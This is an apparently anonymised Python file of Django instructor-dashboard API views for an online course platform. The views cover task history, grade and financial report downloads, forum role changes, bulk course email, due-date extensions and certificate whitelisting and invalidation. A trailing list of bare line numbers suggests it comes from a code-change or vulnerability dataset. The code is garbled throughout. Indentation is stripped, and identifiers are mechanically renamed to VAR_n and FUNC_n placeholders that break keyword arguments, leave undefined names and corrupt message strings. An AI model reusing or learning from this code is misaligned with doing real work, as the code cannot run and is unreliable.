VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_131 = 'bulk_course_email'
VAR_133 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_131=task_type)
VAR_63 = {
'emails': map(extract_email_features, VAR_133),
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_47(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_134 = strip_if_string(VAR_9.POST.get('problem_location_str', False))
VAR_40 = VAR_9.POST.get('unique_student_identifier', None)
if VAR_40 is not None:
VAR_40 = get_student_from_identifier(VAR_40)
if VAR_40 and not VAR_134:
return HttpResponseBadRequest(
"unique_student_identifier must accompany problem_location_str"
)
if VAR_134:
try:
VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_134)
except InvalidKeyError:
return HttpResponseBadRequest()
if VAR_40:
VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_188, VAR_40)
else:
VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, VAR_188)
else:
VAR_132 = instructor_task.api.get_running_instructor_tasks(VAR_10)
VAR_63 = {
'tasks': map(extract_task_features, VAR_132),
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_48(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_by_id(VAR_10)
VAR_40 = VAR_9.POST.get('unique_student_identifier', None)
if VAR_40 is not None:
VAR_40 = get_student_from_identifier(VAR_40)
try:
VAR_189 = VAR_10.make_usage_key_from_deprecated_string(VAR_65.entrance_exam_id)
except InvalidKeyError:
return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
if VAR_40:
VAR_132 = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, VAR_189, VAR_40)
else:
VAR_132 = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, VAR_189)
VAR_63 = {
'tasks': map(extract_task_features, VAR_132),
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_49(VAR_35, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_135 = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
VAR_63 = {
'downloads': [
dict(VAR_16=name, VAR_147=url, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
]
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_5
def FUNC_50(VAR_35, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_135 = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
VAR_63 = {
'downloads': [
dict(VAR_16=name, VAR_147=url, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
]
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_51(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_export_ora2_data(VAR_9, VAR_38)
VAR_172 = _("The ORA VAR_192 report is being generated.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _(
"An ORA VAR_192 report generation VAR_150 is already in "
"progress. Check the 'Pending Tasks' table "
"for the status of the VAR_150. When completed, the report "
"will be available for download in the table below."
)
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_52(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_calculate_grades_csv(VAR_9, VAR_38)
VAR_172 = _("The grade report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _("The grade report is currently being VAR_149."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_53(VAR_9, VAR_10):
VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
try:
instructor_task.api.submit_problem_grade_report(VAR_9, VAR_38)
VAR_172 = _("The problem grade report is being VAR_149."
" To view the status of the report, see Pending Tasks below.")
return JsonResponse({"status": VAR_172})
except AlreadyRunningError:
VAR_196 = _("A problem grade report is already being generated."
" To view the status of the report, see Pending Tasks below."
" You will be able to download the report when it is complete.")
return JsonResponse({
"status": VAR_196
})
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('rolename')
def FUNC_54(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_by_id(VAR_10)
VAR_136 = has_access(VAR_9.user, 'instructor', VAR_65)
VAR_137 = has_forum_access(
VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
)
VAR_64 = VAR_9.POST.get('rolename')
if not (VAR_137 or VAR_136):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
if VAR_64 == FORUM_ROLE_ADMINISTRATOR and not VAR_136:
return HttpResponseBadRequest("Operation requires instructor VAR_165.")
if VAR_64 not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_64 '{}'.".format(VAR_64)
))
try:
VAR_190 = Role.objects.get(VAR_16=VAR_64, VAR_10=VAR_10)
VAR_191 = VAR_190.users.all().order_by('username')
except Role.DoesNotExist:
VAR_191 = []
def FUNC_84(VAR_19):
return {
'username': VAR_19.username,
'email': VAR_19.email,
'first_name': VAR_19.first_name,
'last_name': VAR_19.last_name,
}
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
VAR_64: map(FUNC_84, VAR_191),
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(send_to="sending to whom", VAR_115="subject line", VAR_74="message text")
def FUNC_55(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
if not BulkEmailFlag.feature_enabled(VAR_10):
return HttpResponseForbidden("Email is not enabled for this VAR_65.")
VAR_138 = json.loads(VAR_9.POST.get("send_to"))
VAR_115 = VAR_9.POST.get("subject")
VAR_74 = VAR_9.POST.get("message")
VAR_139 = microsite.get_value('course_email_template_name')
VAR_140 = microsite.get_value('course_email_from_addr')
try:
VAR_14 = CourseEmail.create(
VAR_10,
VAR_9.user,
VAR_138,
VAR_115, VAR_74,
VAR_139=template_name,
VAR_140=from_addr
)
except ValueError as err:
return HttpResponseBadRequest(repr(err))
instructor_task.api.submit_bulk_course_email(VAR_9, VAR_10, VAR_14.id)
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'success': True,
}
return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(
VAR_141="email or VAR_15 of VAR_19 to change access",
VAR_64="the forum role",
VAR_57="'allow' or 'revoke'",
)
@FUNC_0
def FUNC_56(VAR_9, VAR_10):
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_65 = get_course_by_id(VAR_10)
VAR_136 = has_access(VAR_9.user, 'instructor', VAR_65)
VAR_137 = has_forum_access(
VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
)
VAR_141 = VAR_9.POST.get('unique_student_identifier')
VAR_64 = VAR_9.POST.get('rolename')
VAR_57 = VAR_9.POST.get('action')
if not (VAR_137 or VAR_136):
return HttpResponseBadRequest(
"Operation requires staff & forum admin or instructor access"
)
if VAR_64 == FORUM_ROLE_ADMINISTRATOR and not VAR_136:
return HttpResponseBadRequest("Operation requires instructor VAR_165.")
if VAR_64 not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
return HttpResponseBadRequest(strip_tags(
"Unrecognized VAR_64 '{}'.".format(VAR_64)
))
VAR_19 = get_student_from_identifier(VAR_141)
try:
update_forum_role(VAR_10, VAR_19, VAR_64, VAR_57)
except Role.DoesNotExist:
return HttpResponseBadRequest("Role does not exist.")
VAR_63 = {
'course_id': VAR_10.to_deprecated_string(),
'action': VAR_57,
}
return JsonResponse(VAR_63)
@require_POST
def FUNC_57(VAR_9, VAR_10): # pylint: disable=unused-argument
VAR_142 = True
VAR_143 = get_user_preference(VAR_9.user, INVOICE_KEY)
if VAR_143 is not None:
VAR_142 = VAR_143 == 'True'
return JsonResponse({
'invoice_copy': VAR_142
})
def FUNC_58(VAR_36):
VAR_16 = getattr(VAR_36, 'display_name', None)
if VAR_16:
return u'{0} ({1})'.format(VAR_16, VAR_36.location.to_deprecated_string())
else:
return VAR_36.location.to_deprecated_string()
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('student', 'url', 'due_datetime')
def FUNC_59(VAR_9, VAR_10):
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
VAR_40 = require_student_from_identifier(VAR_9.POST.get('student'))
VAR_36 = find_unit(VAR_65, VAR_9.POST.get('url'))
VAR_144 = parse_datetime(VAR_9.POST.get('due_datetime'))
set_due_date_extension(VAR_65, VAR_36, VAR_40, VAR_144)
return JsonResponse(_(
'Successfully changed due date for VAR_40 {0} for {1} '
'to {2}').format(VAR_40.profile.name, FUNC_58(VAR_36),
VAR_144.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('student', 'url')
def FUNC_60(VAR_9, VAR_10):
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
VAR_40 = require_student_from_identifier(VAR_9.POST.get('student'))
VAR_36 = find_unit(VAR_65, VAR_9.POST.get('url'))
set_due_date_extension(VAR_65, VAR_36, VAR_40, None)
if not getattr(VAR_36, "due", None):
return JsonResponse(
_("Successfully removed invalid due date extension (VAR_36 has no due date).")
)
VAR_145 = VAR_36.due.strftime('%Y-%m-%d %H:%M')
return JsonResponse(_(
'Successfully reset due date for VAR_40 {0} for {1} '
'to {2}').format(VAR_40.profile.name, FUNC_58(VAR_36),
VAR_145))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('url')
def FUNC_61(VAR_9, VAR_10):
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
VAR_36 = find_unit(VAR_65, VAR_9.POST.get('url'))
return JsonResponse(dump_module_extensions(VAR_65, VAR_36))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('student')
def FUNC_62(VAR_9, VAR_10):
VAR_40 = require_student_from_identifier(VAR_9.POST.get('student'))
VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
return JsonResponse(dump_student_extensions(VAR_65, VAR_40))
def FUNC_63(VAR_37):
VAR_146 = re.split(r'[\n\r\s,]', VAR_37)
VAR_146 = [s.strip() for s in VAR_146]
VAR_146 = [s for s in VAR_146 if s != '']
return VAR_146
def FUNC_64(VAR_38, VAR_39=None):
VAR_147 = reverse('instructor_dashboard', VAR_3={'course_id': unicode(VAR_38)})
if VAR_39 is not None:
VAR_147 += u'#view-{VAR_39}'.format(VAR_39=section)
return VAR_147
@FUNC_3
@require_POST
def FUNC_65(VAR_9, VAR_10=None): # pylint: disable=unused-argument
VAR_38 = CourseKey.from_string(VAR_10)
certs_api.generate_example_certificates(VAR_38)
return redirect(FUNC_64(VAR_38, VAR_39='certificates'))
@FUNC_3
@require_POST
def FUNC_66(VAR_9, VAR_10=None):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_148 = (VAR_9.POST.get('certificates-enabled', 'false') == 'true')
certs_api.set_cert_generation_enabled(VAR_38, VAR_148)
return redirect(FUNC_64(VAR_38, VAR_39='certificates'))
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_67(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
VAR_128 = VAR_9.POST.get('unique_student_identifier')
VAR_40 = get_student_from_identifier(VAR_128)
VAR_72, VAR_149 = EntranceExamConfiguration.objects.get_or_create(VAR_19=VAR_40, VAR_10=VAR_10)
if VAR_149:
VAR_74 = _('This VAR_40 (%s) will skip the entrance exam.') % VAR_128
else:
VAR_74 = _('This VAR_40 (%s) is already allowed to skip the entrance exam.') % VAR_128
VAR_63 = {
'message': VAR_74,
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_68(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_150 = instructor_task.api.generate_certificates_for_students(VAR_9, VAR_38)
VAR_74 = _('Certificate generation VAR_150 for all VAR_125 of this VAR_65 has been started. '
'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.')
VAR_63 = {
'message': VAR_74,
'task_id': VAR_150.task_id
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_69(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
VAR_151 = VAR_9.POST.getlist('certificate_statuses', [])
if not VAR_151:
return JsonResponse(
{'message': _('Please select one or more VAR_163 statuses that require VAR_163 regeneration.')},
status=400
)
VAR_152 = [CertificateStatuses.downloadable, CertificateStatuses.error, CertificateStatuses.notpassing]
if not set(VAR_151).issubset(VAR_152):
return JsonResponse(
{'message': _('Please select VAR_163 statuses from the list only.')},
status=400
)
try:
instructor_task.api.regenerate_certificates(VAR_9, VAR_38, VAR_151)
except AlreadyRunningError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
VAR_63 = {
'message': _('Certificate regeneration VAR_150 has been started. '
'You can view the status of the generation VAR_150 in the "Pending Tasks" VAR_39.'),
'success': True
}
return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_http_methods(['POST', 'DELETE'])
def FUNC_70(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
try:
VAR_41, VAR_40 = FUNC_73(VAR_9, VAR_38)
except ValueError as VAR_169:
return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
if VAR_9.method == 'POST':
try:
VAR_154 = FUNC_71(VAR_38, VAR_40, VAR_41)
except ValueError as VAR_169:
return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
return JsonResponse(VAR_154)
elif VAR_9.method == 'DELETE':
try:
FUNC_72(VAR_38, VAR_40)
except ValueError as VAR_169:
return JsonResponse({'success': False, 'message': VAR_169.message}, status=400)
return JsonResponse({}, status=204)
def FUNC_71(VAR_38, VAR_40, VAR_41):
if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_40)) > 0:
raise ValueError(
_("Student (VAR_15/VAR_14={VAR_19}) already in VAR_163 VAR_154 list.").format(VAR_19=VAR_40.username)
)
VAR_153, VAR_72 = CertificateWhitelist.objects.get_or_create(
VAR_19=VAR_40,
VAR_10=VAR_38,
defaults={
'whitelist': True,
'notes': VAR_41.get('notes', '')
}
)
VAR_44 = GeneratedCertificate.eligible_certificates.filter(
VAR_19=VAR_40,
VAR_10=VAR_38,
status=CertificateStatuses.downloadable,
).first()
VAR_154 = dict({
'id': VAR_153.id,
'user_email': VAR_40.email,
'user_name': VAR_40.username,
'user_id': VAR_40.id,
'certificate_generated': VAR_44 and VAR_44.created_date.strftime("%B %d, %Y"),
'created': VAR_153.created.strftime("%A, %B %d, %Y"),
})
return VAR_154
def FUNC_72(VAR_38, VAR_40):
try:
VAR_41 = CertificateWhitelist.objects.get(VAR_19=VAR_40, VAR_10=VAR_38)
except ObjectDoesNotExist:
raise ValueError(
_('Certificate VAR_154 (VAR_19={VAR_19}) does not exist in VAR_163 white list. '
'Please refresh the page and try again.').format(VAR_19=VAR_40.username)
)
try:
VAR_44 = GeneratedCertificate.objects.get( # pylint: disable=no-member
VAR_19=VAR_40,
VAR_10=VAR_38
)
VAR_44.invalidate()
VAR_0.info(
u'Certificate invalidated for %s in VAR_65 %s when removed from VAR_163 VAR_154 list',
VAR_40.username,
VAR_38
)
except ObjectDoesNotExist:
pass
VAR_41.delete()
def FUNC_73(VAR_9, VAR_38):
VAR_41 = FUNC_74(VAR_9)
VAR_19 = VAR_41.get('user_name', '') or VAR_41.get('user_email', '')
if not VAR_19:
raise ValueError(_('Student VAR_15/VAR_14 field is required and can not be empty. '
'Kindly fill in VAR_15/VAR_14 and then press "Add to Exception List" button.'))
VAR_155 = FUNC_75(VAR_19, VAR_38)
return VAR_41, VAR_155
def FUNC_74(VAR_9):
try:
VAR_192 = json.loads(VAR_9.body or '{}')
except ValueError:
raise ValueError(_('The record is not in the correct format. Please add a valid VAR_15 or VAR_14 address.'))
return VAR_192
def FUNC_75(VAR_42, VAR_38):
try:
VAR_40 = get_user_by_username_or_email(VAR_42)
except ObjectDoesNotExist:
raise ValueError(_("{VAR_19} does not exist in the LMS. Please check your spelling and retry.").format(
VAR_19=VAR_42
))
if not CourseEnrollment.is_enrolled(VAR_40, VAR_38):
raise ValueError(_("{VAR_19} is not enrolled in this VAR_65. Please check your spelling and retry.")
.format(VAR_19=VAR_42))
return VAR_40
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_76(VAR_9, VAR_10, VAR_43=None):
VAR_38 = CourseKey.from_string(VAR_10)
if VAR_43 == 'all':
VAR_125 = 'all_whitelisted'
elif VAR_43 == 'new':
VAR_125 = 'whitelisted_not_generated'
else:
return JsonResponse(
{
'success': False,
'message': _('Invalid VAR_192, VAR_43 must be "new" or "all".'),
},
status=400
)
instructor_task.api.generate_certificates_for_students(VAR_9, VAR_38, student_set=VAR_125)
VAR_63 = {
'success': True,
'message': _('Certificate generation started for white listed VAR_125.'),
}
return JsonResponse(VAR_63)
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_POST
def FUNC_77(VAR_9, VAR_10): # pylint: disable=invalid-VAR_16
VAR_156 = 0
VAR_157 = 1
VAR_158 = ['data_format_error', 'user_not_exist', 'user_already_white_listed', 'user_not_enrolled']
VAR_38 = CourseKey.from_string(VAR_10)
VAR_125, VAR_50, VAR_159 = [], [], []
VAR_49 = {VAR_160: [] for VAR_160 in VAR_158}
def FUNC_86(VAR_160, VAR_161, VAR_162):
VAR_49[VAR_160].append(_('user "{VAR_19}" in row# {row}').format(VAR_19=VAR_161, row=VAR_162))
if 'students_list' in VAR_9.FILES:
try:
VAR_194 = VAR_9.FILES.get('students_list')
if VAR_194.name.endswith('.csv'):
VAR_125 = [row for row in VAR_26.reader(VAR_194.read().splitlines())]
else:
VAR_50.append(_('Make sure that the file you upload is in CSV format with no '
'extraneous characters or VAR_124.'))
except Exception: # pylint: disable=broad-except
VAR_50.append(_('Could not read uploaded file.'))
finally:
VAR_194.close()
VAR_166 = 0
for VAR_40 in VAR_125:
VAR_166 += 1
if len(VAR_40) != 2:
if len(VAR_40) > 0:
FUNC_86('data_format_error', VAR_40[VAR_156], VAR_166)
VAR_0.info(u'invalid VAR_192/format in VAR_26 row# %s', VAR_166)
continue
VAR_19 = VAR_40[VAR_156]
try:
VAR_19 = get_user_by_username_or_email(VAR_19)
except ObjectDoesNotExist:
FUNC_86('user_not_exist', VAR_19, VAR_166)
VAR_0.info(u'student %s does not exist', VAR_19)
else:
if len(CertificateWhitelist.get_certificate_white_list(VAR_38, VAR_19)) > 0:
FUNC_86('user_already_white_listed', VAR_19, VAR_166)
VAR_0.warning(u'student %s already exist.', VAR_19.username)
elif not CourseEnrollment.is_enrolled(VAR_19, VAR_38):
FUNC_86('user_not_enrolled', VAR_19, VAR_166)
VAR_0.warning(u'student %s is not enrolled in VAR_65.', VAR_19.username)
else:
CertificateWhitelist.objects.create(
VAR_19=VAR_19,
VAR_10=VAR_38,
whitelist=True,
notes=VAR_40[VAR_157]
)
VAR_159.append(_('user "{VAR_15}" in row# {row}').format(VAR_15=VAR_19.username, row=VAR_166))
else:
VAR_50.append(_('File is not attached.'))
VAR_51 = {
'general_errors': VAR_50,
'row_errors': VAR_49,
'success': VAR_159
}
return JsonResponse(VAR_51)
@transaction.non_atomic_requests
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_3
@require_http_methods(['POST', 'DELETE'])
def FUNC_78(VAR_9, VAR_10):
VAR_38 = CourseKey.from_string(VAR_10)
try:
VAR_45 = FUNC_74(VAR_9)
VAR_163 = FUNC_81(VAR_45, VAR_38)
except ValueError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
if VAR_9.method == 'POST':
try:
VAR_46 = FUNC_79(VAR_9, VAR_163, VAR_45)
except ValueError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
return JsonResponse(VAR_46)
elif VAR_9.method == 'DELETE':
try:
FUNC_80(VAR_9, VAR_38, VAR_163)
except ValueError as VAR_169:
return JsonResponse({'message': VAR_169.message}, status=400)
return JsonResponse({}, status=204)
def FUNC_79(VAR_9, VAR_44, VAR_45):
if len(CertificateInvalidation.get_certificate_invalidations(
VAR_44.course_id,
VAR_44.user,
)) > 0:
raise ValueError(
_("Certificate of {VAR_19} has already been invalidated. Please check your spelling and retry.").format(
VAR_19=VAR_44.user.username,
)
)
if not VAR_44.is_valid():
raise ValueError(
_("Certificate for VAR_40 {VAR_19} is already invalid, kindly verify that VAR_163 was generated "
"for this VAR_40 and then proceed.").format(VAR_19=VAR_44.user.username)
)
VAR_46, VAR_72 = CertificateInvalidation.objects.update_or_create(
VAR_44=generated_certificate,
defaults={
'invalidated_by': VAR_9.user,
'notes': VAR_45.get("notes", ""),
'active': True,
}
)
VAR_44.invalidate()
return {
'id': VAR_46.id,
'user': VAR_46.generated_certificate.user.username,
'invalidated_by': VAR_46.invalidated_by.username,
'created': VAR_46.created.strftime("%B %d, %Y"),
'notes': VAR_46.notes,
}
def FUNC_80(VAR_9, VAR_38, VAR_44):
try:
VAR_46 = CertificateInvalidation.objects.get(VAR_44=generated_certificate)
except ObjectDoesNotExist:
raise ValueError(_("Certificate Invalidation does not exist, Please refresh the page and try again."))
else:
VAR_46.deactivate()
VAR_40 = VAR_46.generated_certificate.user
instructor_task.api.generate_certificates_for_students(
VAR_9, VAR_38, student_set="specific_student", specific_student_id=VAR_40.id
)
def FUNC_81(VAR_46, VAR_38):
VAR_19 = VAR_46.get("user")
if not VAR_19:
raise ValueError(
_('Student VAR_15/VAR_14 field is required and can not be empty. '
'Kindly fill in VAR_15/VAR_14 and then press "Invalidate Certificate" button.')
)
VAR_40 = FUNC_75(VAR_19, VAR_38)
VAR_163 = GeneratedCertificate.certificate_for_student(VAR_40, VAR_38)
if not VAR_163:
raise ValueError(_(
"The VAR_40 {student} does not have VAR_163 for the VAR_65 {course}. Kindly verify VAR_40 "
"username/VAR_14 and the selected VAR_65 are correct and try again."
).format(VAR_40=VAR_40.username, VAR_65=VAR_38.course))
return VAR_163
| [
3,
5,
39,
41,
89,
91,
94,
97,
114,
116,
117,
141,
142,
147,
155,
156,
160,
166,
172,
179,
180,
185,
192,
193,
197,
203,
209,
216,
217,
223,
226,
233,
238,
245,
246,
259,
260,
266,
270,
276,
278,
284,
285,
291,
295,
301,
303,
309,
310,
315,
316,
326,
329,
334,
338,
341,
346,
347,
348,
353,
356,
367,
374,
379,
380,
389,
390,
395,
404,
405,
407,
408,
409,
415,
426,
427,
429,
440,
441,
442,
448,
453,
460,
461,
470,
472,
473,
478,
482,
484,
486,
487,
491,
497,
503,
508,
510,
511,
515,
529,
532,
533,
542,
552,
558,
560,
561,
581,
603,
605,
606,
615,
625,
666,
671,
674,
685,
687,
688,
689,
700,
713,
721,
729,
734,
736,
737,
742,
744,
745,
752,
762,
769,
770,
782,
797,
802,
808,
820,
821,
827,
830,
832,
835,
837,
843,
849,
850,
864,
866,
884,
885,
886,
887,
894,
897,
902,
903,
912,
921,
929,
930,
939,
941,
958,
960,
963,
972,
980,
981,
990,
993,
995,
1000,
1003,
1011,
1026,
1027,
1040,
1046,
1047,
1061,
1063,
1067,
1077,
1078,
1113,
1119,
1120,
1143,
1153,
1158,
1159,
1170,
1171,
1178,
1183,
1184,
1196,
1200,
1223,
1224,
1232,
1235,
1240,
1242,
1243,
1244,
1245,
1246,
1247,
1248,
1249,
1250,
1252,
1259,
1260,
1261,
1262,
1276,
1278,
1281,
1285,
1286,
1291,
1315,
1316,
1325,
1328,
1347,
1348,
1361,
1380,
1387,
1391,
1393,
1394,
1404,
1418,
1422,
1423,
1446,
1447,
1471,
1472,
1495,
1496,
1515,
1530,
1531,
1536,
1544,
1547,
1550,
1551,
1557,
1575,
1576,
1585,
1590,
1594,
1595,
1603,
1604,
1614,
1615,
1619,
1623,
1626,
1627,
1638,
1639,
1644,
1649,
1662,
1678,
1699,
1706,
1709,
1720,
1723,
1730,
1742,
1748,
1769,
1772,
1774,
1775,
1786,
1788,
1789,
1804,
1806,
1807,
1817,
1818,
1822,
1826,
1832,
1833,
1835,
1837,
1838,
1848,
1849,
1856,
1857,
1861,
1865,
1868,
1869,
1877,
1878,
1879,
1881,
1887,
1888,
1895,
1902,
1903,
1915,
1923,
1925,
1931,
1932,
1943,
1947,
1963,
1971,
1972,
1981,
1982,
1986,
1991,
1994,
2007,
2017,
2019,
2020,
2028,
2032,
2046,
2051,
2058,
2059,
2068,
2069,
2073,
2082,
2085,
2086,
2097,
2102,
2111,
2113,
2116,
2121,
2126,
2129,
2139,
2141,
2142,
2152,
2156,
2163,
2168,
2170,
2175,
2180,
2185,
2194,
2195,
2205,
2207,
2212,
2213,
2223,
2225,
2230,
2231,
2238,
2250,
2255,
2262,
2265,
2268,
2270,
2275,
2276,
2283,
2293,
2299,
2302,
2304,
2309,
2310,
2320,
2328,
2329,
2340,
2348,
2349,
2362,
2371,
2373,
2374,
2394,
2395,
2404,
2421,
2422,
2431,
2435,
2444,
2446,
2447,
2452,
2453,
2456,
2457,
2462,
2468,
2477,
2483,
2484,
2501,
2504,
2508,
2509,
2510,
2511,
2512,
2513,
2516,
2517,
2518,
2519,
2531,
2532,
2534,
2540,
2541,
2554,
2559,
2571,
2575,
2576,
2581,
2582,
2585,
2590,
2592,
2597,
2603,
2604,
2614,
2618,
2619,
2629,
2630,
2645,
2650,
2651,
2666,
2670,
2676,
2677,
2690,
2691,
2705,
2706,
2710,
2714,
2718,
2722,
2724,
2725,
2728,
2731,
2734,
2737,
2743,
2744,
2749,
2752,
2755,
2760,
2761,
2766,
2769,
2772,
2778,
2779,
2792,
2802,
2803,
2822,
2823,
2841,
2842,
2853,
2860,
2861,
2870,
2876,
2881,
2882,
2889,
2890,
2896,
2898,
2899,
2904,
2914,
2923,
2929,
2938,
2940,
2941,
2947,
2959,
2972,
2975,
2976,
2981,
2987,
2993,
2995,
2996,
3000,
3008,
3010,
3011,
3016,
3027,
3028,
3033,
3034,
3043,
3051,
3053,
3055,
3058,
3060,
3068,
3070,
3075,
3077,
3078,
3104,
3110,
3119,
3124,
3128,
3129,
3135,
3146,
3147,
3151,
3160,
3163,
3169,
3171,
3172,
3181,
3187,
3193,
3194,
3201,
3202,
3208,
3210,
3211,
3215,
3230,
3231,
3237,
3238,
3247,
3248,
3257,
3258,
3263,
3269,
3274,
3276,
3277,
3282,
3283,
3287,
3290,
3296,
3302,
3304,
3312,
1,
2,
3,
4,
5,
6,
7,
119,
120,
121,
122,
144,
145,
146,
147,
148,
149,
150,
151,
182,
183,
184,
185,
186,
187,
188,
219,
220,
221,
222,
223,
224,
225,
226,
227,
228,
229,
230,
248,
262,
263,
264,
265,
266,
267,
268,
287,
288,
289,
290,
291,
292,
293,
321,
322,
323,
324,
325,
326,
327,
328,
329,
330,
331,
332,
333,
334,
335,
336,
337,
463,
464,
465,
475,
476,
477,
489,
490,
491,
492,
493,
494,
495,
496,
497,
498,
499,
513,
514,
515,
516,
517,
518,
519,
520,
521,
